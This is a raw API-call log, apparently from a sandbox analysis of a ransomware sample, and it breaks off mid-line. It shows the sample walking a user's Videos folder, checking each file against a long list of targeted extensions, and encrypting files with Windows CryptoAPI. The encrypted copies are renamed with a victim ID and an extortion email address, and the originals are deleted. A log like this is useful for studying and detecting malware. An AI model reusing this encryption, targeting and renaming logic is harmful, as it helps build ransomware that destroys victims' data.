	[0199.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.532] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="inetcache") returned 0x0
	[0199.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.534] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="nvidia") returned 0x0
	[0199.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.534] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="packages") returned 0x0
	[0199.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.534] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="cookies") returned 0x0
	[0199.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.534] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="programdata") returned 0x0
	[0199.535] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ec9c4f0, ftCreationTime.dwHighDateTime=0x1d97226, ftLastAccessTime.dwLowDateTime=0x88c13ec0, ftLastAccessTime.dwHighDateTime=0x1d972a0, ftLastWriteTime.dwLowDateTime=0x88c13ec0, ftLastWriteTime.dwHighDateTime=0x1d972a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0199.535] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b5cd50, ftCreationTime.dwHighDateTime=0x1d96705, ftLastAccessTime.dwLowDateTime=0x1c671150, ftLastAccessTime.dwHighDateTime=0x1d96e86, ftLastWriteTime.dwLowDateTime=0x1c671150, ftLastWriteTime.dwHighDateTime=0x1d96e86, nFileSizeHigh=0x0, nFileSizeLow=0x6d3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="5VRihtsJYx.mkv", cAlternateFileName="5VRIHT~1.MKV")) returned 1
	[0199.535] lstrcmpW (lpString1="5VRihtsJYx.mkv", lpString2="..") returned 1
	[0199.535] lstrcmpW (lpString1="5VRihtsJYx.mkv", lpString2=".") returned 1
	[0199.535] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\"
	[0199.535] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\", lpString2="5VRihtsJYx.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\5VRihtsJYx.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\5VRihtsJYx.mkv"
	[0199.535] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\5VRihtsJYx.mkv") returned 64
	[0199.536] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.536] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\5VRihtsJYx.mkv", cchLength=0x40 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv") returned 0x40
	[0199.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.536] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.536] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv"
	[0199.536] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv") returned 64
	[0199.536] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.537] StrStrW (lpFirst=".mkv", lpSrch=".") returned=".mkv"
	[0199.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.537] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mkv") returned=".mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0199.537] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.538] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.538] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0199.541] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x6d3c, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x6d3c, lpOverlapped=0x0) returned 1
	[0199.544] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.545] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcae68) returned 1
	[0199.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.547] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0199.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.547] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0199.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.547] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9670) returned 1
	[0199.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.548] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x6d3c, dwBufLen=0x6d3c | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x6d40) returned 1
	[0199.550] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.550] RtlMoveMemory (in: Destination=0xfe3ec8, Source=0xfdd180, Length=0x6d3c | out: Destination=0xfe3ec8) 
	[0199.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.550] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe3ec8*, pdwDataLen=0x18aefc*=0x6d3c, dwBufLen=0x6d40 | out: pbData=0xfe3ec8*, pdwDataLen=0x18aefc*=0x6d40) returned 1
	[0199.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.552] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0199.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.553] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0199.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.553] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0199.553] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.553] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.554] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0199.555] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 106
	[0199.555] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0199.556] WriteFile (in: hFile=0x388, lpBuffer=0xfe3ec8*, nNumberOfBytesToWrite=0x6d40, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe3ec8*, lpNumberOfBytesWritten=0x18b358*=0x6d40, lpOverlapped=0x0) returned 1
	[0199.560] CloseHandle (hObject=0x388) returned 1
	[0199.560] CloseHandle (hObject=0x2c0) returned 1
	[0199.560] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv")) returned 1
	[0199.569] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\5vrihtsjyx.mkv")) returned 0
	[0199.569] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b905640, ftCreationTime.dwHighDateTime=0x1d9755e, ftLastAccessTime.dwLowDateTime=0xf32675e0, ftLastAccessTime.dwHighDateTime=0x1d975fd, ftLastWriteTime.dwLowDateTime=0xf32675e0, ftLastWriteTime.dwHighDateTime=0x1d975fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6uMJ9SfOMg6Z58WFzT", cAlternateFileName="6UMJ9S~1")) returned 1
	[0199.569] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7641a000, ftCreationTime.dwHighDateTime=0x1d9718d, ftLastAccessTime.dwLowDateTime=0x1c8ef340, ftLastAccessTime.dwHighDateTime=0x1d974ea, ftLastWriteTime.dwLowDateTime=0x1c8ef340, ftLastWriteTime.dwHighDateTime=0x1d974ea, nFileSizeHigh=0x0, nFileSizeLow=0x3ea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="o5W4xG5 P4g tu.flv", cAlternateFileName="O5W4XG~1.FLV")) returned 1
	[0199.569] lstrcmpW (lpString1="o5W4xG5 P4g tu.flv", lpString2="..") returned 1
	[0199.569] lstrcmpW (lpString1="o5W4xG5 P4g tu.flv", lpString2=".") returned 1
	[0199.569] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\"
	[0199.569] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\", lpString2="o5W4xG5 P4g tu.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\o5W4xG5 P4g tu.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\o5W4xG5 P4g tu.flv"
	[0199.570] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\o5W4xG5 P4g tu.flv") returned 68
	[0199.570] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.570] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\o5W4xG5 P4g tu.flv", cchLength=0x44 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv") returned 0x44
	[0199.570] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.570] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.570] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv"
	[0199.570] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv") returned 68
	[0199.570] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.571] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.571] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0199.571] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.571] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.a